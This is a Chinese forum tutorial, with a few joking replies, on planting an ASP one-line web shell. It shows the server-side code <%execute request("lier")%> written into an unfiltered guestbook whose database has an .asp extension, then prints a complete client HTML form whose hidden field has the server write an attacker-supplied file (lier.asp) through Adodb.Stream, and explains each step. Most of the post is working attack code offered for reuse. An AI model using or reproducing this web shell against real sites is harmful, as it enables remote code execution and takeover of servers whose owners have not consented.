先展示过程吧

要求：数据库为asp后缀。

找到一个没有过滤，可以直接写入数据库的地方。我们这里是测试留言板，写入服务端代码：

我们本地将asp数据库改会mdb，看看数据库中是否成功写入：

数据已经成功写入。
我们改回成asp。

利用我们写好的客户端进行连接。

生成的内容我选了半年前写的小马。

我们点提交！

好了，我们访问我们的小马，http://localhost/db/lier.asp

完成。

其实整个过程很简单：
因为数据库是asp格式的，我们写入的服务端代码<%execute request("lier")%>能被执行。
该代码的意思就是：执行提交过来的lier变量的值。
这个值究竟是什么呢？
我们来看看我们客户端的代码。

<b><font color="#993399" size="4" >百度null__贴吧一句话木马客户端</font></b>
<hr align="left" color=#799AE1 width='500'>
<br><br>
<form method="post">
   <b><font color="#0000FF">服务端文件地址：</font></b>
   <input   name=url type="text"   style="font-size: 12px;border: menu 1px solid" size="46" >
     <br>
     <input type="hidden" name="lier" value="set lP=server.createObject(&quot;Adodb.Stream&quot;) :lP.Open :lP.Type=2:lP.CharSet=&quot;gb2312&quot; :lP.writetext request(&quot;tx&quot;) :lP.SaveToFile server.mappath(&quot;lier.asp&quot;),2 :lP.Close :set lP=nothing" />
     <br>
     <b><font color=#0000FF>lier.asp的内容: </font></b><br>
     </font>
   <textarea name="tx" cols="70" rows="16"   style="font-size: 12px;border: menu 3px solid"></textarea>
<br><br>
<input type="submit"   value="submit" style="border:1px solid #799AE1;" onClick="this.form.action=this.form.url.value;">
</form>

我们可以看到按下提交按钮后，onclick=".....",响应click事件，我们将以post方式来将表单的值提交给表单中url元素指定的目标asp文件。
可以看到表单中有name为lier这个隐藏域，服务端就是执行这个lier的value。
我们看看这个value做了什么？
创建了一个lier.asp的文件，内容呢?看这句lP.writetext request(&quot;tx&quot;)
是一个tx的值。
那么tx在哪儿呢？
看到没？在客户端代码中是不是有个textarea叫tx?
对了，生成的文件内容就是tx的值了。
好吧，lier.asp生成过程就是这样了。
=======================================
一句话木马就这样了。

你这是挖墙角？？锄头挥的比较好啊～～http://tieba.baidu.com/f?kz=1105573162

没啦，我介是想增加贴吧人气。

0.0

挥锄神功练得不错- -
继续努力～～